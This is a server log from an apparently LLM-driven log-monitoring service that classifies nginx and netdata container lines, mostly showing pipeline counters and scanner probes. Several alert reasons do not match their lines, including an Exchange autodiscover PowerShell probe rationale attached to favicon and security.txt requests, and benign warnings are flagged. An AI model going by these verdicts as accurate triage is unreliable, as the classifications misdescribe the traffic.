Mar 20 09:28:30 ip-172-26-12-110 observer[1565011]:   "action": "allow",
Mar 20 09:28:30 ip-172-26-12-110 observer[1565011]:   "pattern_type": "prefix",
Mar 20 09:28:30 ip-172-26-12-110 observer[1565011]:   "pattern": "GET /robots.txt",
Mar 20 09:28:30 ip-172-26-12-110 observer[1565011]:   "source_hint": "webserver",
Mar 20 09:28:30 ip-172-26-12-110 observer[1565011]:   "variable_fields": [
Mar 20 09:28:30 ip-172-26-12-110 observer[1565011]:     {"token": "2026-03-20T09:28:25.058825312Z", "type": "timestamp", "replacement": "<TS>"},
Mar 20 09:28:30 ip-172-26-12-110 observer[1565011]:     {"token": "1.967 ms", "type": "duration", "replacement": "<DUR>"}
Mar 20 09:28:30 ip-172-26-12-110 observer[1565011]:   ]
Mar 20 09:28:30 ip-172-26-12-110 observer[1565011]: }
Mar 20 09:28:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:28:30.029406 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: invalid character ' ' after decimal point in numeric literal
Mar 20 09:28:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:28:30.029416 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-20T09:28:25.058825312Z GET /robots.txt 200 1.967 ms - 26
Mar 20 09:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:28:31.936653 [observer] Pipeline: processed=3832 pattern_hits=3756 llm_calls=76 llm_errors=1 learned=0
Mar 20 09:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:28:31.936682 [observer] Patterns: hash=3756 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=76
Mar 20 09:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:29:01.942496 [observer] Pipeline: processed=3836 pattern_hits=3760 llm_calls=76 llm_errors=1 learned=0
Mar 20 09:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:29:01.942534 [observer] Patterns: hash=3760 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=76
Mar 20 09:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:29:31.942085 [observer] Pipeline: processed=3838 pattern_hits=3762 llm_calls=76 llm_errors=1 learned=0
Mar 20 09:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:29:31.942108 [observer] Patterns: hash=3762 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=76
Mar 20 09:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:30:01.963846 [observer] Pipeline: processed=3842 pattern_hits=3766 llm_calls=76 llm_errors=1 learned=0
Mar 20 09:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:30:01.963879 [observer] Patterns: hash=3766 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=76
Mar 20 09:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:30:31.943560 [observer] Pipeline: processed=3844 pattern_hits=3768 llm_calls=76 llm_errors=1 learned=0
Mar 20 09:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:30:31.943586 [observer] Patterns: hash=3768 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=76
Mar 20 09:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:31:01.958761 [observer] Pipeline: processed=3848 pattern_hits=3772 llm_calls=76 llm_errors=1 learned=0
Mar 20 09:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:31:01.958794 [observer] Patterns: hash=3772 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=76
Mar 20 09:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:31:31.943300 [observer] Pipeline: processed=3850 pattern_hits=3774 llm_calls=76 llm_errors=1 learned=0
Mar 20 09:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:31:31.943334 [observer] Patterns: hash=3774 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=76
Mar 20 09:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:32:01.954660 [observer] Pipeline: processed=3852 pattern_hits=3776 llm_calls=76 llm_errors=1 learned=0
Mar 20 09:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:32:01.954693 [observer] Patterns: hash=3776 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=76
Mar 20 09:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:32:31.935190 [observer] Pipeline: processed=3858 pattern_hits=3782 llm_calls=76 llm_errors=1 learned=0
Mar 20 09:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:32:31.935220 [observer] Patterns: hash=3782 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=76
Mar 20 09:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:33:01.948093 [observer] Pipeline: processed=3860 pattern_hits=3784 llm_calls=76 llm_errors=1 learned=0
Mar 20 09:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:33:01.948120 [observer] Patterns: hash=3784 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=76
Mar 20 09:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:33:31.934133 [observer] Pipeline: processed=3864 pattern_hits=3788 llm_calls=76 llm_errors=1 learned=0
Mar 20 09:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:33:31.934192 [observer] Patterns: hash=3788 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=76
Mar 20 09:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:34:01.959364 [observer] Pipeline: processed=3866 pattern_hits=3790 llm_calls=76 llm_errors=1 learned=0
Mar 20 09:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:34:01.959391 [observer] Patterns: hash=3790 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=76
Mar 20 09:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:34:31.934411 [observer] Pipeline: processed=3870 pattern_hits=3794 llm_calls=76 llm_errors=1 learned=0
Mar 20 09:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:34:31.934432 [observer] Patterns: hash=3794 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=76
Mar 20 09:34:57 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:34:57.716234 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 09:34:57 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:34:57.716269 [analyzer] Source hint mismatch: LLM says "tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern
Mar 20 09:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:35:01.948570 [observer] Pipeline: processed=3874 pattern_hits=3796 llm_calls=78 llm_errors=1 learned=0
Mar 20 09:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:35:01.948600 [observer] Patterns: hash=3796 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=78
Mar 20 09:35:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:35:05.901112 [analyzer] LLM verdict for docker:captain-netdata-container: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 09:35:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:35:05.901248 [SUSPICIOUS] Source=docker:captain-netdata-container Reason=A WARNING about a missing configuration file could indicate a misconfiguration or environment drift. Not inherently malicious but warrants monitoring. Line=2026-03-20T09:34:51.559617314Z 2026-03-20 09:34:51: tc-qos-helper.sh: WARNING: Cannot find file '/usr/lib/netdata/conf.d/tc-qos-helper.conf'.
Mar 20 09:35:11 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:35:11.896981 [analyzer] LLM verdict for docker:captain-netdata-container: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 09:35:11 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:35:11.897013 [SUSPICIOUS] Source=docker:captain-netdata-container Reason=A missing configuration file warning from a netdata-related helper could indicate misconfiguration or missing mounts; not immediately malicious but warrants inspection. Line=2026-03-20T09:34:51.561251563Z 2026-03-20 09:34:51: tc-qos-helper.sh: WARNING: Cannot find file '/etc/netdata/tc-qos-helper.conf'.
Mar 20 09:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:35:31.949008 [observer] Pipeline: processed=3877 pattern_hits=3798 llm_calls=79 llm_errors=1 learned=0
Mar 20 09:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:35:31.949037 [observer] Patterns: hash=3798 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=79
Mar 20 09:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:36:01.944171 [observer] Pipeline: processed=3881 pattern_hits=3802 llm_calls=79 llm_errors=1 learned=0
Mar 20 09:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:36:01.944200 [observer] Patterns: hash=3802 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=79
Mar 20 09:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:36:31.944665 [observer] Pipeline: processed=3883 pattern_hits=3804 llm_calls=79 llm_errors=1 learned=0
Mar 20 09:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:36:31.944693 [observer] Patterns: hash=3804 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=79
Mar 20 09:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:37:01.943394 [observer] Pipeline: processed=3888 pattern_hits=3809 llm_calls=79 llm_errors=1 learned=0
Mar 20 09:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:37:01.943492 [observer] Patterns: hash=3809 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=79
Mar 20 09:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:37:31.944842 [observer] Pipeline: processed=3892 pattern_hits=3813 llm_calls=79 llm_errors=1 learned=0
Mar 20 09:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:37:31.944870 [observer] Patterns: hash=3813 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=79
Mar 20 09:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:38:01.996224 [observer] Pipeline: processed=3896 pattern_hits=3817 llm_calls=79 llm_errors=1 learned=0
Mar 20 09:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:38:01.996266 [observer] Patterns: hash=3817 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=79
Mar 20 09:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:38:31.943771 [observer] Pipeline: processed=3898 pattern_hits=3819 llm_calls=79 llm_errors=1 learned=0
Mar 20 09:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:38:31.943798 [observer] Patterns: hash=3819 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=79
Mar 20 09:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:39:01.939141 [observer] Pipeline: processed=3900 pattern_hits=3821 llm_calls=79 llm_errors=1 learned=0
Mar 20 09:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:39:01.939508 [observer] Patterns: hash=3821 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=79
Mar 20 09:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:39:31.936786 [observer] Pipeline: processed=3904 pattern_hits=3825 llm_calls=79 llm_errors=1 learned=0
Mar 20 09:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:39:31.936811 [observer] Patterns: hash=3825 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=79
Mar 20 09:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:40:01.985957 [observer] Pipeline: processed=3906 pattern_hits=3827 llm_calls=79 llm_errors=1 learned=0
Mar 20 09:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:40:01.985990 [observer] Patterns: hash=3827 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=79
Mar 20 09:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:40:31.933979 [observer] Pipeline: processed=3910 pattern_hits=3831 llm_calls=79 llm_errors=1 learned=0
Mar 20 09:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:40:31.934002 [observer] Patterns: hash=3831 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=79
Mar 20 09:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:41:01.965858 [observer] Pipeline: processed=3912 pattern_hits=3833 llm_calls=79 llm_errors=1 learned=0
Mar 20 09:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:41:01.965885 [observer] Patterns: hash=3833 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=79
Mar 20 09:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:41:31.934950 [observer] Pipeline: processed=3915 pattern_hits=3836 llm_calls=79 llm_errors=1 learned=0
Mar 20 09:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:41:31.934977 [observer] Patterns: hash=3836 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=79
Mar 20 09:42:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:42:01.944019 [observer] Pipeline: processed=3918 pattern_hits=3839 llm_calls=79 llm_errors=1 learned=0
Mar 20 09:42:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:42:01.944045 [observer] Patterns: hash=3839 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=79
Mar 20 09:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:42:31.934888 [observer] Pipeline: processed=3922 pattern_hits=3843 llm_calls=79 llm_errors=1 learned=0
Mar 20 09:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:42:31.934913 [observer] Patterns: hash=3843 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=79
Mar 20 09:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:43:01.941177 [observer] Pipeline: processed=3926 pattern_hits=3847 llm_calls=79 llm_errors=1 learned=0
Mar 20 09:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:43:01.941207 [observer] Patterns: hash=3847 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=79
Mar 20 09:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:43:31.944540 [observer] Pipeline: processed=3928 pattern_hits=3849 llm_calls=79 llm_errors=1 learned=0
Mar 20 09:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:43:31.944574 [observer] Patterns: hash=3849 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=79
Mar 20 09:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:44:01.944988 [observer] Pipeline: processed=3932 pattern_hits=3853 llm_calls=79 llm_errors=1 learned=0
Mar 20 09:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:44:01.945021 [observer] Patterns: hash=3853 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=79
Mar 20 09:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:44:31.941497 [observer] Pipeline: processed=3934 pattern_hits=3855 llm_calls=79 llm_errors=1 learned=0
Mar 20 09:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:44:31.941523 [observer] Patterns: hash=3855 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=79
Mar 20 09:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:45:01.949798 [observer] Pipeline: processed=3937 pattern_hits=3858 llm_calls=79 llm_errors=1 learned=0
Mar 20 09:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:45:01.949832 [observer] Patterns: hash=3858 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=79
Mar 20 09:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:45:31.940741 [observer] Pipeline: processed=3940 pattern_hits=3861 llm_calls=79 llm_errors=1 learned=0
Mar 20 09:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:45:31.940765 [observer] Patterns: hash=3861 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=79
Mar 20 09:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:46:01.955224 [observer] Pipeline: processed=3942 pattern_hits=3863 llm_calls=79 llm_errors=1 learned=0
Mar 20 09:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:46:01.955250 [observer] Patterns: hash=3863 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=79
Mar 20 09:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:46:31.939745 [observer] Pipeline: processed=3946 pattern_hits=3867 llm_calls=79 llm_errors=1 learned=0
Mar 20 09:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:46:31.939779 [observer] Patterns: hash=3867 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=79
Mar 20 09:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:47:01.952099 [observer] Pipeline: processed=3948 pattern_hits=3869 llm_calls=79 llm_errors=1 learned=0
Mar 20 09:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:47:01.952134 [observer] Patterns: hash=3869 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=79
Mar 20 09:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:47:31.935099 [observer] Pipeline: processed=3954 pattern_hits=3875 llm_calls=79 llm_errors=1 learned=0
Mar 20 09:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:47:31.935125 [observer] Patterns: hash=3875 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=79
Mar 20 09:47:33 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:47:33.648427 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=TLS/SSL handshake data appears in the request portion with a 400 response, indicating a possible malformed client hello or probe attempt. Line=2026-03-20T09:47:33.648112258Z 66.132.172.201 - - [20/Mar/2026:09:47:33 +0000] "_" "\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03u\xB9\xD9\xA5\xB9>\xD7\x19d\x9F\xA0 \x97\xAF\xF2c\x88\x1D\x82uP\x84\xE1\...
Mar 20 09:47:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:47:37.978937 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=TLS/SSL handshake data appears in the request portion with a 400 response, indicating a possible malformed client hello or probe attempt. Line=2026-03-20T09:47:37.978704460Z 66.132.172.201 - - [20/Mar/2026:09:47:37 +0000] "_" "PRI * HTTP/2.0" 400 150 "-" "-" "-"
Mar 20 09:47:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:47:39.073879 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T09:47:39.073592574Z 66.132.172.201 - - [20/Mar/2026:09:47:39 +0000] "54.200.221.0" "GET /favicon.ico HTTP/1.1" 404 2401 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censy...
Mar 20 09:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:48:01.952565 [observer] Pipeline: processed=3961 pattern_hits=3882 llm_calls=79 llm_errors=1 learned=0
Mar 20 09:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:48:01.952600 [observer] Patterns: hash=3882 prefix=0 regex=0 contains=0 deny=18 alert=294 suppress=0 misses=79
Mar 20 09:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:48:31.934972 [observer] Pipeline: processed=3964 pattern_hits=3885 llm_calls=79 llm_errors=1 learned=0
Mar 20 09:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:48:31.934996 [observer] Patterns: hash=3885 prefix=0 regex=0 contains=0 deny=18 alert=294 suppress=0 misses=79
Mar 20 09:48:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:48:47.236358 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 09:48:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:48:47.236399 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An error log from nginx referencing a missing security.txt file. This could be a casual misconfiguration or a scanner probing for security.txt; not clearly malicious but worth monitoring. Line=2026-03-20T09:48:42.685997983Z 2026/03/20 09:48:42 [error] 422#422: *748306 open() "/usr/share/nginx/default/security.txt" failed (2: No such file or directory), client: 66.132.172.201, server: _, req...
Mar 20 09:48:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:48:47.236464 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T09:48:42.686070852Z 66.132.172.201 - - [20/Mar/2026:09:48:42 +0000] "54.200.221.0" "GET /security.txt HTTP/1.1" 404 2401 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.cens...
Mar 20 09:48:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:48:47.523207 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=TLS/SSL handshake data appears in the request portion with a 400 response, indicating a possible malformed client hello or probe attempt. Line=2026-03-20T09:48:47.522897648Z 66.132.172.201 - - [20/Mar/2026:09:48:47 +0000] "_" "\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x035\x85\x9D\x87\x92\x1D#8\x91nJ0\x19\x06j\xF4\xCE;\x8FSs\xF1aN\xDA\xA8\x9A...
Mar 20 09:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:49:01.945485 [observer] Pipeline: processed=3970 pattern_hits=3890 llm_calls=80 llm_errors=1 learned=0
Mar 20 09:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:49:01.945551 [observer] Patterns: hash=3890 prefix=0 regex=0 contains=0 deny=19 alert=295 suppress=0 misses=80
Mar 20 09:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:49:31.935198 [observer] Pipeline: processed=3972 pattern_hits=3892 llm_calls=80 llm_errors=1 learned=0
Mar 20 09:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:49:31.935223 [observer] Patterns: hash=3892 prefix=0 regex=0 contains=0 deny=19 alert=295 suppress=0 misses=80
Mar 20 09:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:50:01.939874 [observer] Pipeline: processed=3976 pattern_hits=3896 llm_calls=80 llm_errors=1 learned=0
Mar 20 09:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:50:01.939905 [observer] Patterns: hash=3896 prefix=0 regex=0 contains=0 deny=19 alert=295 suppress=0 misses=80
Mar 20 09:50:25 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:50:25.166291 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 400 on root path from an unusual client string and highly variable user-agent indicates a possible probe or malformed request pattern typical of scanners. Line=2026-03-20T09:50:25.165705488Z 216.180.246.228 - - [20/Mar/2026:09:50:25 +0000] "54.200.221.0" "GET / HTTP/1.1" 400 248 "-" "Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomec...
Mar 20 09:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:50:31.052515 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 400 on root path from an unusual client string and highly variable user-agent indicates a possible probe or malformed request pattern typical of scanners. Line=2026-03-20T09:50:31.051004636Z 216.180.246.228 - - [20/Mar/2026:09:50:31 +0000] "54.200.221.0" "GET /manage/account/login HTTP/1.1" 400 248 "-" "Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://w...
Mar 20 09:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:50:31.935424 [observer] Pipeline: processed=3980 pattern_hits=3900 llm_calls=80 llm_errors=1 learned=0
Mar 20 09:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:50:31.935450 [observer] Patterns: hash=3900 prefix=0 regex=0 contains=0 deny=19 alert=297 suppress=0 misses=80
Mar 20 09:50:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:50:36.370883 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 400 on root path from an unusual client string and highly variable user-agent indicates a possible probe or malformed request pattern typical of scanners. Line=2026-03-20T09:50:36.370515930Z 216.180.246.228 - - [20/Mar/2026:09:50:36 +0000] "54.200.221.0" "GET /admin/index.html HTTP/1.1" 400 248 "-" "Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.n...
Mar 20 09:50:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:50:40.148971 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 400 on root path from an unusual client string and highly variable user-agent indicates a possible probe or malformed request pattern typical of scanners. Line=2026-03-20T09:50:40.148677173Z 216.180.246.228 - - [20/Mar/2026:09:50:40 +0000] "54.200.221.0" "GET /index.html HTTP/1.1" 400 248 "-" "Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.c...
Mar 20 09:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:51:01.958309 [observer] Pipeline: processed=3986 pattern_hits=3906 llm_calls=80 llm_errors=1 learned=0
Mar 20 09:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:51:01.958344 [observer] Patterns: hash=3906 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 09:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:51:31.943837 [observer] Pipeline: processed=3988 pattern_hits=3908 llm_calls=80 llm_errors=1 learned=0
Mar 20 09:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:51:31.943862 [observer] Patterns: hash=3908 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 09:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:52:01.995398 [observer] Pipeline: processed=3991 pattern_hits=3911 llm_calls=80 llm_errors=1 learned=0
Mar 20 09:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:52:01.995443 [observer] Patterns: hash=3911 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 09:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:52:31.935848 [observer] Pipeline: processed=3994 pattern_hits=3914 llm_calls=80 llm_errors=1 learned=0
Mar 20 09:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:52:31.935879 [observer] Patterns: hash=3914 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 09:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:53:01.963380 [observer] Pipeline: processed=3998 pattern_hits=3918 llm_calls=80 llm_errors=1 learned=0
Mar 20 09:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:53:01.963418 [observer] Patterns: hash=3918 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 09:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:53:31.934067 [observer] Pipeline: processed=4002 pattern_hits=3922 llm_calls=80 llm_errors=1 learned=0
Mar 20 09:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:53:31.934091 [observer] Patterns: hash=3922 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 09:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:54:01.956840 [observer] Pipeline: processed=4004 pattern_hits=3924 llm_calls=80 llm_errors=1 learned=0
Mar 20 09:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:54:01.956871 [observer] Patterns: hash=3924 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 09:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:54:31.935542 [observer] Pipeline: processed=4008 pattern_hits=3928 llm_calls=80 llm_errors=1 learned=0
Mar 20 09:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:54:31.935569 [observer] Patterns: hash=3928 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 09:55:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:55:01.953601 [observer] Pipeline: processed=4010 pattern_hits=3930 llm_calls=80 llm_errors=1 learned=0
Mar 20 09:55:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:55:01.953633 [observer] Patterns: hash=3930 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
